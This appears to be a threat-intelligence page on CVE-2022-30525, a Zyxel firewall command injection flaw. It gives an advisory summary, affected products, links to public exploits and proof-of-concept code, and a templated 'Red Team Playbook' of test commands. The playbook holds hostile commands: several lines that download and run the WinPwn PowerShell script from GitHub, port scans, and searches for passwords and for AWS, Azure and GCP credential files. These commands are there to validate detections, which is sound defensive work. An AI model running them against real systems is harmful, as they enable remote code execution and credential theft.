CVE-2022-30525
Overview
This vulnerability is an OS command injection flaw rooted in improper input validation within the CGI program of Zyxel USG FLEX and VPN series firmware. The affected component fails to sanitize user-supplied parameters in HTTP POST requests, allowing injection of arbitrary shell commands. The flaw specifically resides in the handler interface used for device configuration tasks, enabling execution of injected commands at the operating system level.
Vulnerability Description
A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
Impact
An unauthenticated attacker can remotely execute arbitrary operating system commands on affected Zyxel devices by exploiting this vulnerability. This enables modification of system files, deployment of malicious payloads, and full compromise of device confidentiality, integrity, and availability. The attacker gains control without requiring any credentials or user interaction, potentially leading to network disruption, data exfiltration, or persistent backdoors within enterprise firewall infrastructure.
Solution
Apply firmware updates provided by Zyxel that address this vulnerability, specifically versions later than 5.21 Patch 1 for USG FLEX, ATP, and VPN series devices. Refer to Zyxel's official security advisory at https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml for detailed patch instructions and version information. No alternative workarounds are documented; prompt firmware upgrade is recommended to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the CGI program of specific Zyxel firewall and VPN firmware versions presents a critical risk due to its nature as an OS command injection flaw. This type of vulnerability occurs when an application improperly sanitizes user input, allowing an attacker to execute arbitrary commands on the underlying operating system. In this case, the affected devices include various models within the USG FLEX series, as well as several VPN and ATP series products. The flaw allows an attacker to modify specific files on the device, which could lead to unauthorized command execution, potentially compromising the device's integrity and security.
Exploitation of this vulnerability can occur through multiple attack vectors. An attacker could leverage crafted HTTP requests targeting the vulnerable CGI scripts, which are designed to process user input. By injecting malicious commands into these requests, an attacker could manipulate the device to execute arbitrary OS commands. This could lead to a range of malicious activities, including data exfiltration, unauthorized access to sensitive information, or even the complete takeover of the device. The ease of exploitation, combined with the high privileges typically associated with these devices, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability is significant, especially for organizations that rely on Zyxel products for their network security. Successful exploitation could lead to severe business risks, including data breaches, loss of customer trust, and potential regulatory penalties. Organizations may face downtime as they respond to incidents, and the financial implications of remediation efforts can be substantial. Furthermore, the potential for lateral movement within a network could expose additional systems to compromise, amplifying the overall risk landscape.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions released by Zyxel is crucial, as these updates often include patches for known vulnerabilities. Network monitoring tools should be employed to detect unusual traffic patterns that may indicate exploitation attempts. Additionally, employing intrusion detection systems (IDS) can help identify and alert on suspicious activities related to command injection attempts. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited.
In conclusion, the OS command injection vulnerability in Zyxel's firmware poses a serious threat to network security, with the potential for significant operational and financial consequences. Organizations must prioritize the implementation of robust security measures, including timely updates, monitoring, and proactive assessments, to safeguard their systems against this and similar vulnerabilities. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such threats and maintain the integrity of their network environments.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2022-30525, as reflected by a modest uptick in telemetry signals. While the overall exploitation trend remains stable, the emergence of additional publicly available proof-of-concept exploits has lowered the barrier for adversaries to weaponize this critical OS command injection vulnerability in Zyxel USG FLEX devices. This development is significant because it broadens the pool of potential attackers, including less sophisticated actors who can now leverage these tools to conduct unauthorized remote command execution. Although ransomware usage linked to this vulnerability remains unconfirmed, the increased accessibility of exploit code heightens the risk of opportunistic attacks that could disrupt network operations or facilitate lateral movement within compromised environments. Consequently, the threat level associated with CVE-2022-30525 should be considered elevated, warranting continued vigilance in monitoring and detection efforts to identify and respond to exploitation attempts promptly.
Affected Products (16)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Usg Flex 100w Firmware | All |
cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 200 Firmware | All |
cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 500 Firmware | All |
cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 700 Firmware | All |
cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vpn100 Firmware | All |
cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vpn1000 Firmware | All |
cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vpn300 Firmware | All |
cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vpn50 Firmware | All |
cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp100 Firmware | All |
cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp100w Firmware | All |
cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp200 Firmware | All |
cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp500 Firmware | All |
cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp700 Firmware | All |
cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp800 Firmware | All |
cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 50w Firmware | All |
cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg20w-Vpn Firmware | All |
cpe:2.3:o:zyxel:usg20w-vpn_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Zyxel Firewall ZTP Unauthenticated Command Injection
exploits/linux/http/zyxel_ztp_rce
|
jbaines-r7 | Unknown | - | View |
|
Zyxel Firewall SUID Binary Privilege Escalation
exploits/linux/local/zyxel_suid_cp_lpe
|
jbaines-r7 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Zyxel USG FLEX 5.21 - OS Command Injection | Valentin Lobstein | remote | hardware | - | View |
GitHub PoCs (15)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
shuai06/CVE-2022-30525
Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525)批量检测脚本
|
shuai06 | 33 | 10 | 2022-05-13 | View |
|
jbaines-r7/victorian_machinery
Proof of concept exploit for CVE-2022-30525 (Zxyel firewall command injection)
|
jbaines-r7 | 30 | 13 | 2022-05-10 | View |
|
Henry4E36/CVE-2022-30525
Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525)
|
Henry4E36 | 22 | 2 | 2022-05-13 | View |
|
west9b/CVE-2022-30525
CVE-2022-30525 Zyxel 防火墙命令注入漏洞 POC&EXPC
|
west9b | 12 | 3 | 2022-05-28 | View |
|
savior-only/CVE-2022-30525
Zyxel 防火墙未经身份验证的远程命令注入
|
savior-only | 4 | 2 | 2022-05-13 | View |
|
Chocapikk/CVE-2022-30525-Reverse-Shell
Simple python script to exploit CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection
|
Chocapikk | 4 | 1 | 2022-05-18 | View |
|
k0sf/CVE-2022-30525
CVE-2022-30525(Zxyel 防火墙命令注入)的概念证明漏洞利用
|
k0sf | 3 | 0 | 2022-05-16 | View |
|
iveresk/cve-2022-30525
Initial POC for the CVE-2022-30525
|
iveresk | 3 | 0 | 2022-05-23 | View |
|
ProngedFork/CVE-2022-30525
CVE-2022-30525 POC
|
ProngedFork | 1 | 1 | 2022-06-13 | View |
|
M4fiaB0y/CVE-2022-30525
Zyxel Firewall Remote Command Injection Vulnerability (CVE-2022-30525) Batch Detection Script
|
M4fiaB0y | 1 | 1 | 2022-05-15 | View |
|
cbk914/CVE-2022-30525_check
|
cbk914 | 2 | 0 | 2023-01-15 | View |
|
arajsingh-infosec/CVE-2022-30525_Exploit
Exploit for CVE-2022-30525
|
arajsingh-infosec | 1 | 1 | 2024-02-27 | View |
|
furkanzengin/CVE-2022-30525
A OS Command Injection Vulnerability in the CGI Program of Zyxel
|
furkanzengin | 1 | 0 | 2022-06-12 | View |
|
superzerosec/CVE-2022-30525
CVE-2022-30525 POC exploit
|
superzerosec | 1 | 0 | 2022-05-16 | View |
|
160Team/CVE-2022-30525
CVE-2022-30525 Zyxel防火墙命令注入漏洞 POC&EXP
|
160Team | 0 | 0 | 2022-05-19 | View |
Threat Feed
25 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-30525 |
| zyxel.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167182/Zyxel-Firewall-ZTP-Unauthenticated-Command-Injection.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167372/Zyxel-USG-FLEX-5.21-Command-Injection.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/168202/Zyxel-Firewall-SUID-Binary-Privilege-Escalation.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-30525 |